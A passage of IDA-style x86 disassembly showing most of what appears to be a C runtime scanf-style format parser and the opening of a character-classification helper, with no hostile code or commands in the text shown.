jz short loc_41B3B0
dec [ebp+var_4]
push edi
lea eax, [ebp+var_4]
push edi
push eax
call sub_41BDAD
pop ecx
pop ecx
push eax
call sub_41BD96
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_41E8A4
add esp, 0Ch
loc_41B39E: ; CODE XREF: sub_41B320+8E�j
test eax, eax
jz short loc_41B3B0
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_41E8A4
pop ecx
jmp short loc_41B39E
; ---------------------------------------------------------------------------
loc_41B3B0: ; CODE XREF: sub_41B320+58�j
; sub_41B320+80�j
cmp byte ptr [esi], 25h
jnz loc_41BC92
and [ebp+var_35], 0
and [ebp+var_18], 0
and [ebp+var_17], 0
and [ebp+var_E], 0
and [ebp+var_F], 0
and [ebp+var_16], 0
xor edi, edi
and [ebp+var_5], 0
mov [ebp+var_1C], ebx
mov [ebp+var_20], ebx
mov [ebp+var_C], ebx
mov [ebp+var_D], 1
mov [ebp+var_30], ebx
loc_41B3E7: ; CODE XREF: sub_41B320+172�j
movzx ebx, byte ptr [esi+1]
inc esi
cmp dword_435E38, 1
jle short loc_41B404
movzx eax, bl
push 4
push eax
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_41B413
; ---------------------------------------------------------------------------
loc_41B404: ; CODE XREF: sub_41B320+D3�j
mov ecx, off_435C2C
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_41B413: ; CODE XREF: sub_41B320+E2�j
test eax, eax
jz short loc_41B429
mov eax, [ebp+var_C]
inc [ebp+var_20]
lea eax, [eax+eax*4]
lea eax, [ebx+eax*2-30h]
mov [ebp+var_C], eax
jmp short loc_41B48E
; ---------------------------------------------------------------------------
loc_41B429: ; CODE XREF: sub_41B320+F5�j
cmp ebx, 4Eh
jg short loc_41B46C
jz short loc_41B48E
cmp ebx, 2Ah
jz short loc_41B467
cmp ebx, 46h
jz short loc_41B48E
cmp ebx, 49h
jz short loc_41B449
cmp ebx, 4Ch
jnz short loc_41B47B
inc [ebp+var_D]
jmp short loc_41B48E
; ---------------------------------------------------------------------------
loc_41B449: ; CODE XREF: sub_41B320+11D�j
cmp byte ptr [esi+1], 36h
jnz short loc_41B47B
cmp byte ptr [esi+2], 34h
lea eax, [esi+2]
jnz short loc_41B47B
inc [ebp+var_30]
and [ebp+var_28], 0
and [ebp+var_24], 0
mov esi, eax
jmp short loc_41B48E
; ---------------------------------------------------------------------------
loc_41B467: ; CODE XREF: sub_41B320+113�j
inc [ebp+var_E]
jmp short loc_41B48E
; ---------------------------------------------------------------------------
loc_41B46C: ; CODE XREF: sub_41B320+10C�j
cmp ebx, 68h
jz short loc_41B488
cmp ebx, 6Ch
jz short loc_41B480
cmp ebx, 77h
jz short loc_41B483
loc_41B47B: ; CODE XREF: sub_41B320+122�j
; sub_41B320+12D�j ...
inc [ebp+var_F]
jmp short loc_41B48E
; ---------------------------------------------------------------------------
loc_41B480: ; CODE XREF: sub_41B320+154�j
inc [ebp+var_D]
loc_41B483: ; CODE XREF: sub_41B320+159�j
inc [ebp+var_5]
jmp short loc_41B48E
; ---------------------------------------------------------------------------
loc_41B488: ; CODE XREF: sub_41B320+14F�j
dec [ebp+var_D]
dec [ebp+var_5]
loc_41B48E: ; CODE XREF: sub_41B320+107�j
; sub_41B320+10E�j ...
cmp [ebp+var_F], 0
jz loc_41B3E7
cmp [ebp+var_E], 0
mov [ebp+arg_4], esi
jnz short loc_41B4B3
mov eax, [ebp+arg_8]
mov [ebp+var_44], eax
add eax, 4
mov [ebp+arg_8], eax
mov eax, [eax-4]
mov [ebp+var_2C], eax
loc_41B4B3: ; CODE XREF: sub_41B320+17F�j
and [ebp+var_F], 0
cmp [ebp+var_5], 0
jnz short loc_41B4D1
mov al, [esi]
cmp al, 53h
jz short loc_41B4CD
cmp al, 43h
jz short loc_41B4CD
or [ebp+var_5], 0FFh
jmp short loc_41B4D1
; ---------------------------------------------------------------------------
loc_41B4CD: ; CODE XREF: sub_41B320+1A1�j
; sub_41B320+1A5�j
mov [ebp+var_5], 1
loc_41B4D1: ; CODE XREF: sub_41B320+19B�j
; sub_41B320+1AB�j
mov ebx, [ebp+arg_4]
movzx esi, byte ptr [ebx]
or esi, 20h
cmp esi, 6Eh
mov [ebp+var_3C], esi
jz short loc_41B50A
cmp esi, 63h
jz short loc_41B4FB
cmp esi, 7Bh
jz short loc_41B4FB
push [ebp+arg_0]
lea eax, [ebp+var_4]
push eax
call sub_41BDAD
pop ecx
jmp short loc_41B506
; ---------------------------------------------------------------------------
loc_41B4FB: ; CODE XREF: sub_41B320+1C5�j
; sub_41B320+1CA�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41BD7C
loc_41B506: ; CODE XREF: sub_41B320+1D9�j
pop ecx
mov [ebp+var_14], eax
loc_41B50A: ; CODE XREF: sub_41B320+1C0�j
xor eax, eax
cmp [ebp+var_20], eax
jz short loc_41B51A
cmp [ebp+var_C], eax
jz loc_41BCF6
loc_41B51A: ; CODE XREF: sub_41B320+1EF�j
cmp esi, 6Fh
jg loc_41B781
jz loc_41BA33
cmp esi, 63h
jz loc_41B75E
cmp esi, 64h
jz loc_41BA33
jle loc_41B7AB
cmp esi, 67h
jle short loc_41B57E
cmp esi, 69h
jz short loc_41B566
cmp esi, 6Eh
jnz loc_41B7AB
cmp [ebp+var_E], 0
mov edi, [ebp+var_4]
jz loc_41BC61
jmp loc_41BC87
; ---------------------------------------------------------------------------
loc_41B566: ; CODE XREF: sub_41B320+229�j
push 64h
pop esi
loc_41B569: ; CODE XREF: sub_41B320+480�j
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz loc_41B7F3
mov [ebp+var_17], 1
jmp loc_41B7F8
; ---------------------------------------------------------------------------
loc_41B57E: ; CODE XREF: sub_41B320+224�j
mov ebx, [ebp+var_14]
lea esi, [ebp+var_1C4]
cmp ebx, 2Dh
jnz short loc_41B59A
mov [ebp+var_1C4], bl
lea esi, [ebp+var_1C3]
jmp short loc_41B59F
; ---------------------------------------------------------------------------
loc_41B59A: ; CODE XREF: sub_41B320+26A�j
cmp ebx, 2Bh
jnz short loc_41B5B6
loc_41B59F: ; CODE XREF: sub_41B320+278�j
mov edi, [ebp+arg_0]
dec [ebp+var_C]
inc [ebp+var_4]
push edi
call sub_41BD7C
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41B5B9
; ---------------------------------------------------------------------------
loc_41B5B6: ; CODE XREF: sub_41B320+27D�j
mov edi, [ebp+arg_0]
loc_41B5B9: ; CODE XREF: sub_41B320+294�j
cmp [ebp+var_20], 0
jz short loc_41B5C8
cmp [ebp+var_C], 15Dh
jle short loc_41B5CF
loc_41B5C8: ; CODE XREF: sub_41B320+29D�j
mov [ebp+var_C], 15Dh
loc_41B5CF: ; CODE XREF: sub_41B320+2A6�j
; sub_41B320+2F2�j
cmp dword_435E38, 1
jle short loc_41B5E4
push 4
push ebx
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_41B5EF
; ---------------------------------------------------------------------------
loc_41B5E4: ; CODE XREF: sub_41B320+2B6�j
mov eax, off_435C2C
mov al, [eax+ebx*2]
and eax, 4
loc_41B5EF: ; CODE XREF: sub_41B320+2C2�j
test eax, eax
jz short loc_41B614
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41B614
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_41BD7C
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41B5CF
; ---------------------------------------------------------------------------
loc_41B614: ; CODE XREF: sub_41B320+2D1�j
; sub_41B320+2DB�j
cmp byte_435E3C, bl
jnz short loc_41B682
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41B682
inc [ebp+var_4]
push edi
call sub_41BD7C
mov ebx, eax
mov al, byte_435E3C
mov [esi], al
pop ecx
mov [ebp+var_14], ebx
inc esi
loc_41B63D: ; CODE XREF: sub_41B320+360�j
cmp dword_435E38, 1
jle short loc_41B652
push 4
push ebx
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_41B65D
; ---------------------------------------------------------------------------
loc_41B652: ; CODE XREF: sub_41B320+324�j
mov eax, off_435C2C
mov al, [eax+ebx*2]
and eax, 4
loc_41B65D: ; CODE XREF: sub_41B320+330�j
test eax, eax
jz short loc_41B682
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41B682
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_41BD7C
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41B63D
; ---------------------------------------------------------------------------
loc_41B682: ; CODE XREF: sub_41B320+2FA�j
; sub_41B320+304�j ...
cmp [ebp+var_1C], 0
jz loc_41B71A
cmp ebx, 65h
jz short loc_41B69A
cmp ebx, 45h
jnz loc_41B71A
loc_41B69A: ; CODE XREF: sub_41B320+36F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41B71A
mov byte ptr [esi], 65h
inc esi
inc [ebp+var_4]
push edi
call sub_41BD7C
mov ebx, eax
pop ecx
cmp ebx, 2Dh
mov [ebp+var_14], ebx
jnz short loc_41B6C1
mov [esi], al
inc esi
jmp short loc_41B6C6
; ---------------------------------------------------------------------------
loc_41B6C1: ; CODE XREF: sub_41B320+39A�j
cmp ebx, 2Bh
jnz short loc_41B6E4
loc_41B6C6: ; CODE XREF: sub_41B320+39F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jnz short loc_41B6D5
and [ebp+var_C], eax
jmp short loc_41B6E4
; ---------------------------------------------------------------------------
loc_41B6D5: ; CODE XREF: sub_41B320+3AE�j
; sub_41B320+3F8�j
inc [ebp+var_4]
push edi
call sub_41BD7C
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_41B6E4: ; CODE XREF: sub_41B320+3A4�j
; sub_41B320+3B3�j
cmp dword_435E38, 1
jle short loc_41B6F9
push 4
push ebx
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_41B704
; ---------------------------------------------------------------------------
loc_41B6F9: ; CODE XREF: sub_41B320+3CB�j
mov eax, off_435C2C
mov al, [eax+ebx*2]
and eax, 4
loc_41B704: ; CODE XREF: sub_41B320+3D7�j
test eax, eax
jz short loc_41B71A
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41B71A
inc [ebp+var_1C]
mov [esi], bl
inc esi
jmp short loc_41B6D5
; ---------------------------------------------------------------------------
loc_41B71A: ; CODE XREF: sub_41B320+366�j
; sub_41B320+374�j ...
dec [ebp+var_4]
push edi
push ebx
call sub_41BD96
cmp [ebp+var_1C], 0
pop ecx
pop ecx
jz loc_41BD26
cmp [ebp+var_E], 0
jnz loc_41BC87
inc [ebp+var_34]
and byte ptr [esi], 0
lea eax, [ebp+var_1C4]
push eax
movsx eax, [ebp+var_D]
push [ebp+var_2C]
dec eax
push eax
call off_435BF0
add esp, 0Ch
jmp loc_41BC87
; ---------------------------------------------------------------------------
loc_41B75E: ; CODE XREF: sub_41B320+20C�j
cmp [ebp+var_20], eax
jnz short loc_41B76D
inc [ebp+var_C]
mov [ebp+var_20], 1
loc_41B76D: ; CODE XREF: sub_41B320+441�j
cmp [ebp+var_5], 0
jle short loc_41B777
mov [ebp+var_16], 1
loc_41B777: ; CODE XREF: sub_41B320+451�j
mov edi, offset asc_435C28 ; "]"
jmp loc_41B88C
; ---------------------------------------------------------------------------
loc_41B781: ; CODE XREF: sub_41B320+1FD�j
mov eax, esi
sub eax, 70h
jz loc_41BA2F
sub eax, 3
jz loc_41B87D
dec eax
dec eax
jz loc_41BA33
sub eax, 3
jz loc_41B569
sub eax, 3
jz short loc_41B7CF
loc_41B7AB: ; CODE XREF: sub_41B320+21B�j
; sub_41B320+22E�j
movzx eax, byte ptr [ebx]
cmp eax, [ebp+var_14]
jnz loc_41BCF6
dec [ebp+var_15]
cmp [ebp+var_E], 0
jnz loc_41BC87
mov eax, [ebp+var_44]
mov [ebp+arg_8], eax
jmp loc_41BC87
; ---------------------------------------------------------------------------
loc_41B7CF: ; CODE XREF: sub_41B320+489�j
cmp [ebp+var_5], 0
jle short loc_41B7D9
mov [ebp+var_16], 1
loc_41B7D9: ; CODE XREF: sub_41B320+4B3�j
mov edi, [ebp+arg_4]
inc edi
mov [ebp+arg_4], edi
cmp byte ptr [edi], 5Eh
jnz loc_41B890
mov eax, edi
lea edi, [eax+1]
jmp loc_41B88C
; ---------------------------------------------------------------------------
loc_41B7F3: ; CODE XREF: sub_41B320+24F�j
cmp ebx, 2Bh
jnz short loc_41B81A
loc_41B7F8: ; CODE XREF: sub_41B320+259�j
dec [ebp+var_C]
jnz short loc_41B809
cmp [ebp+var_20], 0
jz short loc_41B809
mov [ebp+var_F], 1
jmp short loc_41B81A
; ---------------------------------------------------------------------------
loc_41B809: ; CODE XREF: sub_41B320+4DB�j
; sub_41B320+4E1�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41BD7C
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_41B81A: ; CODE XREF: sub_41B320+4D6�j
; sub_41B320+4E7�j
cmp ebx, 30h
jnz loc_41BA68
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41BD7C
mov ebx, eax
pop ecx
cmp bl, 78h
mov [ebp+var_14], ebx
jz short loc_41B868
cmp bl, 58h
jz short loc_41B868
cmp esi, 78h
mov [ebp+var_1C], 1
jz short loc_41B852
push 6Fh
loc_41B84C: ; CODE XREF: sub_41B320+55B�j
pop esi
jmp loc_41BA68
; ---------------------------------------------------------------------------
loc_41B852: ; CODE XREF: sub_41B320+528�j
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_41BD96
pop ecx
pop ecx
push 30h
pop ebx
jmp loc_41BA65
; ---------------------------------------------------------------------------
loc_41B868: ; CODE XREF: sub_41B320+517�j
; sub_41B320+51C�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41BD7C
pop ecx
mov ebx, eax
mov [ebp+var_14], ebx
push 78h
jmp short loc_41B84C
; ---------------------------------------------------------------------------
loc_41B87D: ; CODE XREF: sub_41B320+46F�j
cmp [ebp+var_5], 0
jle short loc_41B887
mov [ebp+var_16], 1
loc_41B887: ; CODE XREF: sub_41B320+561�j
mov edi, offset asc_435C20 ; " \t-\r]"
loc_41B88C: ; CODE XREF: sub_41B320+45C�j
; sub_41B320+4CE�j
or [ebp+var_18], 0FFh
loc_41B890: ; CODE XREF: sub_41B320+4C3�j
push 20h
lea eax, [ebp+var_64]
push 0
push eax
call sub_415CA0
add esp, 0Ch
cmp [ebp+var_3C], 7Bh
jnz short loc_41B8B4
cmp byte ptr [edi], 5Dh
jnz short loc_41B8B4
mov dl, 5Dh
inc edi
mov [ebp+var_59], 20h
jmp short loc_41B8B7
; ---------------------------------------------------------------------------
loc_41B8B4: ; CODE XREF: sub_41B320+584�j
; sub_41B320+589�j
mov dl, [ebp+var_35]
loc_41B8B7: ; CODE XREF: sub_41B320+592�j
; sub_41B320+5E1�j ...
mov al, [edi]
cmp al, 5Dh
jz short loc_41B91C
inc edi
cmp al, 2Dh
jnz short loc_41B903
test dl, dl
jz short loc_41B903
mov cl, [edi]
cmp cl, 5Dh
jz short loc_41B903
inc edi
cmp dl, cl
jnb short loc_41B8D6
mov al, cl
jmp short loc_41B8DA
; ---------------------------------------------------------------------------
loc_41B8D6: ; CODE XREF: sub_41B320+5B0�j
mov al, dl
mov dl, cl
loc_41B8DA: ; CODE XREF: sub_41B320+5B4�j
cmp dl, al
ja short loc_41B8FF
movzx edx, dl
movzx esi, al
sub esi, edx
inc esi
loc_41B8E7: ; CODE XREF: sub_41B320+5DD�j
mov ecx, edx
mov eax, edx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
inc edx
dec esi
jnz short loc_41B8E7
loc_41B8FF: ; CODE XREF: sub_41B320+5BC�j
xor dl, dl
jmp short loc_41B8B7
; ---------------------------------------------------------------------------
loc_41B903: ; CODE XREF: sub_41B320+5A0�j
; sub_41B320+5A4�j ...
movzx ecx, al
mov dl, al
mov eax, ecx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
jmp short loc_41B8B7
; ---------------------------------------------------------------------------
loc_41B91C: ; CODE XREF: sub_41B320+59B�j
cmp byte ptr [edi], 0
jz loc_41BD26
cmp [ebp+var_3C], 7Bh
jnz short loc_41B92E
mov [ebp+arg_4], edi
loc_41B92E: ; CODE XREF: sub_41B320+609�j
mov edi, [ebp+arg_0]
mov esi, [ebp+var_2C]
dec [ebp+var_4]
push edi
push [ebp+var_14]
mov [ebp+var_30], esi
call sub_41BD96
pop ecx
pop ecx
loc_41B945: ; CODE XREF: sub_41B320+6BC�j
; sub_41B320+6C4�j
cmp [ebp+var_20], 0
jz short loc_41B959
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz loc_41B9F5
loc_41B959: ; CODE XREF: sub_41B320+629�j
inc [ebp+var_4]
push edi
call sub_41BD7C
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+var_14], eax
jz short loc_41B9E9
mov ecx, eax
push 1
and ecx, 7
pop edx
movsx ebx, [ebp+var_18]
shl edx, cl
mov ecx, eax
sar ecx, 3
movsx ecx, [ebp+ecx+var_64]
xor ecx, ebx
test edx, ecx
jz short loc_41B9E9
cmp [ebp+var_E], 0
jnz short loc_41B9E1
cmp [ebp+var_16], 0
jz short loc_41B9D6
mov ecx, off_435C2C
mov [ebp+var_38], al
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41B9B5
inc [ebp+var_4]
push edi
call sub_41BD7C
pop ecx
mov [ebp+var_37], al
loc_41B9B5: ; CODE XREF: sub_41B320+686�j
push dword_435E38
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_3E]
push eax
call sub_41E709
mov ax, [ebp+var_3E]
add esp, 0Ch
mov [esi], ax
inc esi
inc esi
jmp short loc_41B9D9
; ---------------------------------------------------------------------------
loc_41B9D6: ; CODE XREF: sub_41B320+673�j
mov [esi], al
inc esi
loc_41B9D9: ; CODE XREF: sub_41B320+6B4�j
mov [ebp+var_2C], esi
jmp loc_41B945
; ---------------------------------------------------------------------------
loc_41B9E1: ; CODE XREF: sub_41B320+66D�j
inc [ebp+var_30]
jmp loc_41B945
; ---------------------------------------------------------------------------
loc_41B9E9: ; CODE XREF: sub_41B320+649�j
; sub_41B320+667�j
dec [ebp+var_4]
push edi
push eax
call sub_41BD96
pop ecx
pop ecx
loc_41B9F5: ; CODE XREF: sub_41B320+633�j
cmp [ebp+var_30], esi
jz loc_41BD26
cmp [ebp+var_E], 0
jnz loc_41BC87
inc [ebp+var_34]
cmp [ebp+var_3C], 63h
jz loc_41BC87
cmp [ebp+var_16], 0
mov eax, [ebp+var_2C]
jz short loc_41BA27
and word ptr [eax], 0
jmp loc_41BC87
; ---------------------------------------------------------------------------
loc_41BA27: ; CODE XREF: sub_41B320+6FC�j
and byte ptr [eax], 0
jmp loc_41BC87
; ---------------------------------------------------------------------------
loc_41BA2F: ; CODE XREF: sub_41B320+466�j
mov [ebp+var_D], 1
loc_41BA33: ; CODE XREF: sub_41B320+203�j
; sub_41B320+215�j ...
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz short loc_41BA41
mov [ebp+var_17], 1
jmp short loc_41BA46
; ---------------------------------------------------------------------------
loc_41BA41: ; CODE XREF: sub_41B320+719�j
cmp ebx, 2Bh
jnz short loc_41BA68
loc_41BA46: ; CODE XREF: sub_41B320+71F�j
dec [ebp+var_C]
jnz short loc_41BA57
cmp [ebp+var_20], 0
jz short loc_41BA57
mov [ebp+var_F], 1
jmp short loc_41BA68
; ---------------------------------------------------------------------------
loc_41BA57: ; CODE XREF: sub_41B320+729�j
; sub_41B320+72F�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41BD7C
pop ecx
mov ebx, eax
loc_41BA65: ; CODE XREF: sub_41B320+543�j
mov [ebp+var_14], ebx
loc_41BA68: ; CODE XREF: sub_41B320+4FD�j
; sub_41B320+52D�j ...
cmp [ebp+var_30], 0
jz loc_41BB81
cmp [ebp+var_F], 0
jnz loc_41BB5F
loc_41BA7C: ; CODE XREF: sub_41B320+82C�j
cmp esi, 78h
jnz short loc_41BAD0
cmp dword_435E38, 1
jle short loc_41BA99
push 80h
push ebx
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_41BAA6
; ---------------------------------------------------------------------------
loc_41BA99: ; CODE XREF: sub_41B320+768�j
mov eax, off_435C2C
mov al, [eax+ebx*2]
and eax, 80h
loc_41BAA6: ; CODE XREF: sub_41B320+777�j
test eax, eax
jz loc_41BB51
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 4
pop ecx
call sub_41EA40
push ebx
mov [ebp+var_28], eax
mov [ebp+var_24], edx
call sub_41BD45
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41BB23
; ---------------------------------------------------------------------------
loc_41BAD0: ; CODE XREF: sub_41B320+75F�j
cmp dword_435E38, 1
jle short loc_41BAE5
push 4
push ebx
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_41BAF0
; ---------------------------------------------------------------------------
loc_41BAE5: ; CODE XREF: sub_41B320+7B7�j
mov eax, off_435C2C
mov al, [eax+ebx*2]
and eax, 4
loc_41BAF0: ; CODE XREF: sub_41B320+7C3�j
test eax, eax
jz short loc_41BB51
cmp esi, 6Fh
jnz short loc_41BB0E
cmp ebx, 38h
jge short loc_41BB51
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 3
pop ecx
call sub_41EA40
jmp short loc_41BB1D
; ---------------------------------------------------------------------------
loc_41BB0E: ; CODE XREF: sub_41B320+7D7�j
push 0
push 0Ah
push [ebp+var_24]
push [ebp+var_28]
call sub_417E10
loc_41BB1D: ; CODE XREF: sub_41B320+7EC�j
mov [ebp+var_28], eax
mov [ebp+var_24], edx
loc_41BB23: ; CODE XREF: sub_41B320+7AE�j
inc [ebp+var_1C]
lea eax, [ebx-30h]
cdq
add [ebp+var_28], eax
adc [ebp+var_24], edx
cmp [ebp+var_20], 0
jz short loc_41BB3B
dec [ebp+var_C]
jz short loc_41BB5F
loc_41BB3B: ; CODE XREF: sub_41B320+814�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41BD7C
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_41BA7C
; ---------------------------------------------------------------------------
loc_41BB51: ; CODE XREF: sub_41B320+788�j
; sub_41B320+7D2�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_41BD96
pop ecx
pop ecx
loc_41BB5F: ; CODE XREF: sub_41B320+756�j
; sub_41B320+819�j
cmp [ebp+var_17], 0
jz loc_41BC45
mov eax, [ebp+var_28]
mov ecx, [ebp+var_24]
neg eax
adc ecx, 0
mov [ebp+var_28], eax
neg ecx
mov [ebp+var_24], ecx
jmp loc_41BC45
; ---------------------------------------------------------------------------
loc_41BB81: ; CODE XREF: sub_41B320+74C�j
cmp [ebp+var_F], 0
jnz loc_41BC3D
loc_41BB8B: ; CODE XREF: sub_41B320+90A�j
cmp esi, 78h
jz short loc_41BBCF
cmp esi, 70h
jz short loc_41BBCF
cmp dword_435E38, 1
jle short loc_41BBAA
push 4
push ebx
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_41BBB5
; ---------------------------------------------------------------------------
loc_41BBAA: ; CODE XREF: sub_41B320+87C�j
mov eax, off_435C2C
mov al, [eax+ebx*2]
and eax, 4
loc_41BBB5: ; CODE XREF: sub_41B320+888�j
test eax, eax
jz short loc_41BC2F
cmp esi, 6Fh
jnz short loc_41BBC8
cmp ebx, 38h
jge short loc_41BC2F
shl edi, 3
jmp short loc_41BC07
; ---------------------------------------------------------------------------
loc_41BBC8: ; CODE XREF: sub_41B320+89C�j
lea edi, [edi+edi*4]
shl edi, 1
jmp short loc_41BC07
; ---------------------------------------------------------------------------
loc_41BBCF: ; CODE XREF: sub_41B320+86E�j
; sub_41B320+873�j
cmp dword_435E38, 1
jle short loc_41BBE7
push 80h
push ebx
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_41BBF4
; ---------------------------------------------------------------------------
loc_41BBE7: ; CODE XREF: sub_41B320+8B6�j
mov eax, off_435C2C
mov al, [eax+ebx*2]
and eax, 80h
loc_41BBF4: ; CODE XREF: sub_41B320+8C5�j
test eax, eax
jz short loc_41BC2F
push ebx
shl edi, 4
call sub_41BD45
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_41BC07: ; CODE XREF: sub_41B320+8A6�j
; sub_41B320+8AD�j
inc [ebp+var_1C]
cmp [ebp+var_20], 0
lea edi, [edi+ebx-30h]
jz short loc_41BC19
dec [ebp+var_C]
jz short loc_41BC3D
loc_41BC19: ; CODE XREF: sub_41B320+8F2�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41BD7C
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_41BB8B
; ---------------------------------------------------------------------------
loc_41BC2F: ; CODE XREF: sub_41B320+897�j
; sub_41B320+8A1�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_41BD96
pop ecx
pop ecx
loc_41BC3D: ; CODE XREF: sub_41B320+865�j
; sub_41B320+8F7�j
cmp [ebp+var_17], 0
jz short loc_41BC45
neg edi
loc_41BC45: ; CODE XREF: sub_41B320+843�j
; sub_41B320+85C�j ...
cmp esi, 46h
jnz short loc_41BC4E
and [ebp+var_1C], 0
loc_41BC4E: ; CODE XREF: sub_41B320+928�j
cmp [ebp+var_1C], 0
jz loc_41BD26
cmp [ebp+var_E], 0
jnz short loc_41BC87
inc [ebp+var_34]
loc_41BC61: ; CODE XREF: sub_41B320+23B�j
cmp [ebp+var_30], 0
jz short loc_41BC77
mov eax, [ebp+var_2C]
mov ecx, [ebp+var_28]
mov [eax], ecx
mov ecx, [ebp+var_24]
mov [eax+4], ecx
jmp short loc_41BC87
; ---------------------------------------------------------------------------
loc_41BC77: ; CODE XREF: sub_41B320+945�j
cmp [ebp+var_D], 0
mov eax, [ebp+var_2C]
jz short loc_41BC84
mov [eax], edi
jmp short loc_41BC87
; ---------------------------------------------------------------------------
loc_41BC84: ; CODE XREF: sub_41B320+95E�j
mov [eax], di
loc_41BC87: ; CODE XREF: sub_41B320+241�j
; sub_41B320+414�j ...
inc [ebp+var_15]
inc [ebp+arg_4]
mov esi, [ebp+arg_4]
jmp short loc_41BCD4
; ---------------------------------------------------------------------------
loc_41BC92: ; CODE XREF: sub_41B320+93�j
inc [ebp+var_4]
push edi
call sub_41BD7C
mov ebx, eax
pop ecx
movzx eax, byte ptr [esi]
inc esi
cmp eax, ebx
mov [ebp+var_14], ebx
mov [ebp+arg_4], esi
jnz short loc_41BD01
mov ecx, off_435C2C
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41BCD4
inc [ebp+var_4]
push edi
call sub_41BD7C
pop ecx
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, eax
mov [ebp+arg_4], esi
jnz short loc_41BD0F
dec [ebp+var_4]
loc_41BCD4: ; CODE XREF: sub_41B320+970�j
; sub_41B320+99A�j
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_41BCEA
cmp byte ptr [esi], 25h
jnz short loc_41BD2C
mov eax, [ebp+arg_4]
cmp byte ptr [eax+1], 6Eh
jnz short loc_41BD2C
mov esi, eax
loc_41BCEA: ; CODE XREF: sub_41B320+9B8�j
mov al, [esi]
test al, al
jnz loc_41B34A
jmp short loc_41BD26
; ---------------------------------------------------------------------------
loc_41BCF6: ; CODE XREF: sub_41B320+1F4�j
; sub_41B320+491�j
push [ebp+arg_0]
dec [ebp+var_4]
push [ebp+var_14]
jmp short loc_41BD06
; ---------------------------------------------------------------------------
loc_41BD01: ; CODE XREF: sub_41B320+98A�j
dec [ebp+var_4]
push edi
push ebx
loc_41BD06: ; CODE XREF: sub_41B320+9DF�j
call sub_41BD96
pop ecx
pop ecx
jmp short loc_41BD26
; ---------------------------------------------------------------------------
loc_41BD0F: ; CODE XREF: sub_41B320+9AF�j
dec [ebp+var_4]
push edi
push eax
call sub_41BD96
dec [ebp+var_4]
push edi
push ebx
call sub_41BD96
add esp, 10h
loc_41BD26: ; CODE XREF: sub_41B320+1F�j
; sub_41B320+40A�j ...
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_41BD3D
loc_41BD2C: ; CODE XREF: sub_41B320+9BD�j
; sub_41B320+9C6�j
mov eax, [ebp+var_34]
test eax, eax
jnz short loc_41BD40
cmp [ebp+var_15], al
jnz short loc_41BD40
or eax, 0FFFFFFFFh
jmp short loc_41BD40
; ---------------------------------------------------------------------------
loc_41BD3D: ; CODE XREF: sub_41B320+A0A�j
mov eax, [ebp+var_34]
loc_41BD40: ; CODE XREF: sub_41B320+A11�j
; sub_41B320+A16�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41B320 endp
; =============== S U B R O U T I N E =======================================
sub_41BD45 proc near ; CODE XREF: sub_41B320+7A3�p
; sub_41B320+8DC�p
arg_0 = dword ptr 4
cmp dword_435E38, 1
push esi
jle short loc_41BD5F
mov esi, [esp+4+arg_0]
push 4
push esi
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_41BD6E
; ---------------------------------------------------------------------------
loc_41BD5F: ; CODE XREF: sub_41BD45+8�j
mov esi, [esp+4+arg_0]
mov eax, off_435C2C
mov al, [eax+esi*2]
and eax, 4
loc_41BD6E: ; CODE XREF: sub_41BD45+18�j
